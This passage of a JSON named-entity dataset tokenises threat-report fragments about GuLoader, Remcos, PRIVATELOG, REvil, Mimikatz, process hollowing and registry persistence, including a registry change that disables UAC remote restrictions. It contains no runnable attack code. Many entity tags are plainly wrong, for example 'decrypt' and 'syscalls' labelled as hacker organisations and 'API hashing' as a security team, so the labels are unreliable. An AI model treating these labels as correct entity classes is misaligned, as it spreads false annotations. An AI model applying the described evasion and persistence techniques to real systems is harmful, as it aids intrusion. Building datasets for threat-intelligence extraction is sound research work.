"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Application", "Layer", "Protocol:", "Web", "Protocols\"" ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "SCHTASKS", "/Create" ], "ner_tags": [ "B-Way", "B-Way" ] }, { "tokens": [ "schtasks", "/run" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Scheduled", "Task/Job:", "Scheduled", "Task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Scheduled", "Task/Job:", "Scheduled", "Task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Exploit", "Public-Facing", "Application" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Boot", "or", "Logon", "Autostart", "Execution:", "Registry", "Run", "Keys", "/", "Startup", "Folder" ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Tool", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "Valid", "Accounts:", "Default", "Accounts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Exploitation", "for", "Privilege", "Escalation" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "System", "Information", "Discovery" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Lateral", "Tool", "Transfer" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Data", "from", "Local", "System" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Encrypted", "Channel:", "Symmetric", "Cryptography" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Unpacked", "file", "names" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "obfuscation", "of", "the", "GuLoader", "shellcode", "and", "payloads" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "to", "download", "additional", "malicious", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "subsequently", "download", "Remcos", "on", "the", "target", "system" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ ":taking", "full", "control", "of", "the", "infected", "machinerecording", "keystrokes", "in", "real", "time", "with" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "second", "shellcode", "revealed", "after", "the", "unpacking", "algorithm", "finished", "processing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "this", "executable", "is", "an", "archive", "that", "can", "be", "unpacked", "with", "the", "help", "of", "7zip" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "we", "unpack", "the", "file,", "we", "can", "see", "several", "elements,", "as", "well", "as", "directories", "typical", "for", "NSIS:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "It", "is", "unpacked" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "packer", "has", "been", "around", "for", "many", "years" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Then", "the", "functions", "are", "used", "to", "load", "and", "decrypt", "the", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "I-Features", "O" ] }, { "tokens": [ "The", "decryption", "function", "is", "custom" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "custom", "decryption", "algorithm", "is", "being", "applied", "on", "the", "buffer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "algorithm", "used", "for", "the", "buffer", "decryption", "differs", "across", "the", "samples." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "shellcode", "is", "used", "for", "decrypting" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-Features" ] }, { "tokens": [ "the", "key", "that", "will", "be", "used", "for", "the", "decryption", "is", "prepared." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "the", "PE", "is", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "can", "see", "decryption", "of", "the", "next", "stage", "with", "the", "help", "of", "a", "custom", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "contains", "a", "very", "similar", "function", "dedicated", "to", "decrypting", "and", "loading", "the", "final", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "Both", "of", "them", "are", "encrypted," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "loading", "the", "final", "payload", "(PE", "file)", "from", "the", "third", "of", "the", "encrypted", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "authors", "used", "several", "common", "techniques", "to", "obfuscate", "this", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "passing", "the", "path", "to", "the", "encrypted", "component", "as", "a", "parameter." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscating", "malicious", "elements." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "As", "before,", "they", "are", "resolved", "by", "their", "hashes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Then,", "a", "function", "defined", "by", "its", "hash", "is", "retrieved", "(using", "the", "same", "hashing", "algorithm", "that", "was", "used", "to", "retrieve", "imports", "from", "normally", "loaded", "DLLs):" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "By", "extracting", "the", "syscalls,", "and", "executing", "them", "manually,", "the", "malware", "can", "use", "the", "API", "of", "the", "operating", "system,", "without", "a", "need", "of", "calling", "functions", "from", "the", "DLL." ], "ner_tags": [ "O", "B-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "functions", "has", "been", "resolved", "by", "their", "hashes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "hashing", "function", "used", "for", "import", "resolving" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "By", "extracting", "the", "syscalls,", "and", "executing", "them", "manually,", "the", "malware", "can", "use", "the", "API", "of", "the", "operating", "system," ], "ner_tags": [ "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "low", "level", "APIs:", "NtCreateSection,", "NtMapViewOfSection" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Functions", "are", "always", "the", "same", "–", "dedicated", "to", "reading", "the", "file", "from", "the", "disk:", "CreateFileW,", "GetTempPathW,", "lstrcatW,", "ReadFile,", "VirtualAlloc,", "GetTempPathW." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "The", "function", "GetTempPathW", "is", "used" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "low-level", "functions,", "directly", "related", "with", "performing", "the", "injection,", "are", "called", "via", "raw", "syscalls" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "PE", "injection" ], "ner_tags": [ "B-Tool", "I-Way" ] }, { "tokens": [ "The", "payload", "is", "implanted", "into", "a", "newly", "created", "suspended", "process", "(a", "new", "instance", "of", "the", "current", "executable)", "using", "one", "of", "the", "most", "popular", "techniques", "of", "PE", "injection:", "Process", "Hollowing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Way", "O" ] }, { "tokens": [ "a", "second,", "encrypted", "component,", "which", "carries", "the", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "a", "check", "against", "blacklisted", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploiting", "vulnerabilities", "in", "the", "remote", "desktop", "protocol", "(RDP)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "distributing", "phishing", "emails", "containing", "malicious", "files" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "it", "attempts", "to", "establish", "a", "connection", "with", "the", "remote", "server", "to", "retrieve", "the", "subsequent", "component", "of", "the", "attack" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "malicious", "template", "file", "is", "downloaded", "and", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "trigger", "the", "retrieval", "of", "the", "final", "stage", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "enables", "the", "document", "to", "fetch", "the", ".dotm", "file", "from", "the", "remote", "server", "required", "for", "further", "actions" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upon", "opening", "the", "malicious", "document" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "obfuscated", "VBA", "macro" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "“cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "the", "Windows", "Registry", "or", "NTFS", "Extended", "Attributes", "to", "hide", "their", "data," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hide", "a", "second", "stage", "payload", "in", "registry", "transaction", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "perform", "a", "number", "of", "changes", "on", "the", "filesystem", "or", "registry," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "store", "and", "retrieve", "binary", "data", "with", "the", "Windows", "API." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "provides", "applications", "with", "API", "functions—available" ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "accessible", "through", "API", "functions." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "opened", "with", "the", "CreateLogFile()", "API" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "clfsw32.dll", "API", "function" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "This", "function", "is", "patched", "using", "Microsoft", "Detours—a", "publicly", "available", "library", "used", "for", "instrumenting", "Win32", "functions—so" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "resolves", "the", "function", "address", "for", "the", "ServiceMain", "export", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "via", "the", "API", "CreateFileTransactedA()" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "via", "the", "API", "NtCreateSection()" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "Obfuscation" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "most", "of", "the", "strings", "used", "by", "PRIVATELOG", "and", "STASHLOG", "are", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "each", "string", "is", "therefore", "encrypted", "with", "a", "unique", "byte", "stream." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "relies", "on", "XOR’ing", "each", "byte", "with", "a", "hard-coded" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "control", "flow", "obfuscation." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "In", "addition", "to", "containing", "obfuscated", "strings,", "the", "installer’s", "code", "is", "protected", "using", "various", "control", "flow", "obfuscation", "techniques", "that", "make", "static", "analysis", "cumbersome" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "installer", "generates", "and", "prints", "out", "encryption", "keys", "that", "the", "actor", "uses", "to", "pre-encrypt", "the", "payload", "before", "it", "is", "written", "to", "disk" ], "ner_tags": [ "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Following", "the", "payload", "header,", "the", "malware", "expects", "blocks", "of", "encrypted", "data", "with", "8-byte", "headers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Each", "block", "is", "then", "re-encrypted", "with", "the", "new", "key", "material", "as", "follows:", "The", "encryption", "key", "is", "the", "16-byte", "GUID" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "encryption", "algorithm", "is", "HC-128," ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sample", "string", "deobfuscation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "some", "of", "the", "deobfuscated", "strings", "from", "the", "installer", "are", "used", "for", "logging", "error", "messages", "and" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "the", "installer", "opens", "and", "decrypts", "the", "contents", "of", "the", "file", "passed", "as", "an", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "file", "contents" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "data", "matches", "the", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "decrypts", "each", "block", "using", "HC-128" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "payload", "which", "will", "be", "decrypted." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "its", "contents", "are", "decrypted", "using", "the", "HC-128", "encryption", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "decryption", "key", "and", "IV", "are", "generated", "using", "the", "same", "unique", "host", "properties" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "only", "decrypts", "the", "first", "matching", "block" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "payload", "contents" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "file", "that", "should", "be", "hidden", "in", "a", "CLFS", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "it", "searches", "for", ".blf", "files", "in", "the", "default", "user’s", "profile", "directory" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "starts", "by", "enumerating", "*.blf", "files", "in", "the", "default", "user’s", "profile", "directory" ], "ner_tags": [ "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "also", "checks", "that", "the", "operating", "system", "version" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "injection", "process" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "For", "example,", "to", "open", "a", "registry", "key", "in", "a", "transaction,", "the", "functions", "RegCreateKeyTransacted(),", "RegOpenKeyTransacted(),", "and", "RegDeleteKeyTransacted()", "are", "available." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "GUID", "returned", "from", "the", "registry", "value" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "to", "steal", "credentials", "from", "host", "memory." ], "ner_tags": [ "B-SamFile", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Mimikatz" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Uses", "Mimikatz", "to", "harvest", "credentials." ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "decrypts", "them", "locally." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Once", "decrypted," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "begins", "to", "decrypt", "and", "parse", "its", "embedded", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "the", "rest", "of", "the", "blob", "once", "it", "has", "been", "decoded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "REvil", "configuration", "has", "decrypted" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Decrypted", "REvil", "configuration" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted", "Ransom", "Cartel", "configuration" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "they", "are", "written", "to", "the", "registry," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "is", "written", "to", "the", "registry", "key", "SOFTWARE\\\\Google_Authenticator\\\\b52dKMhj," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "data", "has", "been", "written", "to", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "within", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Modifies", "the", "Registry", "to", "disable", "UAC", "remote", "restrictions", "by", "setting", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "to", "1." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "first", "checks", "to", "see", "if", "the", "registry", "already", "contains", "previously", "generated", "values;", "if", "so,", "it", "will", "read", "those", "values", "into", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "the", "command", "line", "provided", "to", "the", "ransomware", "is", "parsed." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Uses", "cmd.exe", "to", "execute", "commands." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "to", "disable", "UAC", "remote", "restrictions", "by", "setting", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "to", "1." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Adds", "registry", "run", "keys", "to", "achieve", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "and", "install", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "retrieve", "the", "malicious", "payload", "and", "download", "additional", "resources" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "Downloads", "and", "uploads", "files", "to", "and", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "tool", "downloads", "the", "files" ], "ner_tags": [ "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Uses", "legitimate", "VPN,", "RDP,", "Citrix", "or", "VNC", "credentials", "to", "maintain", "access", "to", "an", "environment." ], "ner_tags": [ "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Deploys", "PDQ", "Inventory", "Scanner", "tool." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "cracked", "version", "of", "a", "legitimate", "tool", "called", "PDQ", "Inventory,", "which", "is", "a", "legitimate", "system", "management", "solution", "that", "IT", "administrators", "use", "to", "scan", "their", "network", "and", "collect", "hardware,", "software", "and", "Windows", "configuration", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "enable", "offline", "password", "cracking." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uses", "Rundll32", "to", "load", "and", "execute", "malicious", "DLL." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ransomware", "will", "proceed", "to", "spawn", "another", "instance", "of", "itself", "via", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Deletes", "some", "of", "its", "files", "used", "during", "operations", "as", "part", "of", "cleanup,", "including", "removing", "applications", "such", "as", "7z.exe,", "tor.exe,", "ssh.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Uses", "encoded", "PowerShell", "commands." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "utilizing", "string", "encryption" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "encrypted", "configuration" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "a", "base64-encoded", "ransom", "note," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "configuration", "is", "stored", "as", "a", "base64-encoded", "blob,", "whereby", "the", "first", "16", "bytes", "of", "the", "base64-encoded", "blob", "is", "the", "RC4", "key" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "opts", "to", "obfuscate", "their", "ransomware", "much", "more", "heavily" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Searches", "for", "specific", "files", "prior", "to", "encryption." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "seeks", "out", "files", "with", "the", "following", "file", "extensions:", ".log,", ".vmdk,", ".vmem,", ".vswp", "and", ".vmsn." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Target", "specific", "file", "path" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "search", "machines", "for", "certain", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uses", "AnyDesk", "to", "remotely", "connect", "and", "transfer", "files." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "used", "this", "as", "a", "remote", "access", "tool", "to", "establish", "an", "interactive", "command", "and", "control", "channel" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Routes", "traffic", "over", "TOR", "and", "VPN", "servers", "to", "obfuscate", "their", "activities." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "TOR", "sites", "redirecting", "to", "a", "new", "ransomware", "operation" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "API", "hashing" ], "ner_tags": [ "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "the", "username" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "computer", "name,", "domain", "name,", "locale", "and", "product", "name." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "leads", "to", "a", "function", "that", "iterates", "over", "a", "call" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "the", "batch", "file," ], "ner_tags": [ "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "a", "batch", "script", "used" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "batch", "files" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "A", "new", "batch", "file,", "localdisk.bat,", "was", "also", "executed" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "These", "discovery", "actions", "were", "completed", "several", "times", "again", "in", "other", "various", "batch", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "was", "executed", "using", "a", "command", "line", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "batch", "file." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "execution", "of", "the", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file", "eyewear.bat", "then", "executed", "two", "commands" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/c" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/c" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "enter", "this", "directly", "in", "the", "host", "OS", "command", "shell." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ ":\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" 